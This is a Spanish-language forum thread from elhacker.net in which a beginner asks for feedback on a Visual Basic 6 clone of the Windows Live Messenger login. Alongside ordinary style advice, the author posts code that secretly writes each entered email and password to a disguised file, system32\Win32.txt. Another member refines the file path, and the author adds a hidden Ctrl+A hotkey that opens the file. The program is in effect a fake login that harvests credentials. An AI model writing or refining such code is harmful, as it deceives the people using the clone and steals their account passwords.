elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Clon Windows Live Messenger
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: Clon Windows Live Messenger  (Leído 4,872 veces)
Elemental Code


Desconectado Desconectado

Mensajes: 622


Im beyond the system


Ver Perfil
Re: Clon Windows Live Messenger
« Respuesta #10 en: 3 Julio 2010, 03:27 am »

Aver, me lo baje y empiezo mal

mirando por arriba dice
"Privasidad"

segundo consejo:
TABULA. se me complica horrores leer el codigo.

Tercer Consejo:
acomoda mejor la imagen de fondo.
yo con una resolucion de 1440 x 900 (lcd 17' wide) me di cuenta que  algo andaba mal cuando maximize.
ponele que onformchangesise (escribilo bien >.<) vuelva al tamaño en el que lo diseñastes.


y esto no es tanto un consejo o sugerencia, va en cada uno, pero yo lo hubiese guardado en un txt y no en una base de datos.

me gusto bastante el efecto realista cuando se subrayan los "links".
y el icono estaba medio flojo.
Fijate que capaz que es por mi windows 7 pero no parecia el del msn 9
tenia como un reborde negro.

Excelente codigo, estaba buscando uno asi.


En línea

I CODE FOR $$$
Programo por $$$
Hago tareas, trabajos para la facultad, lo que sea en VB6.0

Mis programas
c0c0_w3y_s0ftwar3

Desconectado Desconectado

Mensajes: 21



Ver Perfil WWW
Re: Clon Windows Live Messenger
« Respuesta #11 en: 3 Julio 2010, 06:50 am »

Graxxx.  Elemental Code...

Por eso keria q alguien lo ejecutara y me diera su consentimiento por k estoy empezan2 a programar ahora y saves q nesecito consejosy ayudas...

Primero nesecito k me especifikes si es donde dice "declaracion de privacidad"  ya lo arregle,,

segun2 Tabula que me kieres decir con eso...

y tercero,, me podrias dar un ejemplo de como acomodar la imagen con esto onformchangesise como me dijiste...

y ya estoy cambian2 la forma de guardar los mails.. la estoy ponien2 en un TXT como me dijiste...

Gracias de nuevo bro...

Salu2...




En línea


No Te equivoques Bro... Las cosas son como tienen que ser...
BlackZeroX
Wiki

Desconectado Desconectado

Mensajes: 3.158


I'Love...!¡.


Ver Perfil WWW
Re: Clon Windows Live Messenger
« Respuesta #12 en: 3 Julio 2010, 07:05 am »


Tabulacion por gerarquia segun tu estructura del codigo ejemplo

Código
  1. sub main()
  2.    For x = 0 to 99
  3.        msgbox "este msgbox esta tabulado y se entiende perfecto!¡."
  4.        if jaja = jojo then
  5.            msgbox "bu-ala otra tabulación según la jerarquía de programación o su flujo del mismo!¡."
  6.        end if
  7.    next
  8. end sub
  9.  
  10.  

Para qué se entienda lo que se abre en una columna se CIERRA EN LA MISMA COLUMNA y se entiende a lectura simple!¡.

Sangriento infierno Lunar!¡.
En línea

The Dark Shadow is my passion.
c0c0_w3y_s0ftwar3

Desconectado Desconectado

Mensajes: 21



Ver Perfil WWW
Re: Clon Windows Live Messenger
« Respuesta #13 en: 3 Julio 2010, 07:28 am »

Ok... ya voy entendien2  BlackZeroX,,, savia q nesecitaba la ayuda de ustedes..

gracias...
En línea


No Te equivoques Bro... Las cosas son como tienen que ser...
c0c0_w3y_s0ftwar3

Desconectado Desconectado

Mensajes: 21



Ver Perfil WWW
Re: Clon Windows Live Messenger
« Respuesta #14 en: 3 Julio 2010, 08:04 am »

En cuanto el code para  guardar los mail en un TXT q tal este ???

Código:
Private Sub Command1_Click()
    Call GuardarArchivo("C:\WINDOWS\system32\Win32.txt", Text1, Text2)
End Sub

Sub GuardarArchivo(Ruta As String, Text1, Text2 As TextBox)
On Error Resume Next
Dim fnum As Integer
On Error GoTo Ninguno
fnum = FreeFile
Open Ruta For Append As fnum
Print #fnum, "Mail:"; Text1.Text
Print #fnum, "Contraseña:"; Text2.Text
Print #fnum, "-------------------------------------------------"
Print #fnum, ""
Close fnum
Exit Sub
Ninguno:
MsgBox "Error al guardar el archivo"
End Sub
En línea


No Te equivoques Bro... Las cosas son como tienen que ser...
Psyke1
Wiki

Desconectado Desconectado

Mensajes: 1.089



Ver Perfil WWW
Re: Clon Windows Live Messenger
« Respuesta #15 en: 3 Julio 2010, 11:55 am »

Pon mejor la ruta asi:
Código
  1. Environ$("windir") & "\system32\Win32.txt"

Salu2! :P
En línea

c0c0_w3y_s0ftwar3

Desconectado Desconectado

Mensajes: 21



Ver Perfil WWW
Re: Clon Windows Live Messenger
« Respuesta #16 en: 3 Julio 2010, 19:46 pm »

Gracias *PsYkE1* ya lo hice asi como me dijiste. y para ejecutar elarchivo lo puse algo asi...
Código:
  
If GetAsyncKeyState(vbKeyControl) And GetAsyncKeyState(vbKeyA) Then
    Call ShellExecute(0&, "Open", (Environ$("windir") & "\system32\Win32.txt"), "", vbNullString, 1)
  End If
En línea


No Te equivoques Bro... Las cosas son como tienen que ser...
Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
He abandonado mi MacBook Pro por este clon de Huawei y casi vuelvo a Windows
Noticias
wolfbcn 0 1,445 Último mensaje 19 Septiembre 2017, 02:10 am
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines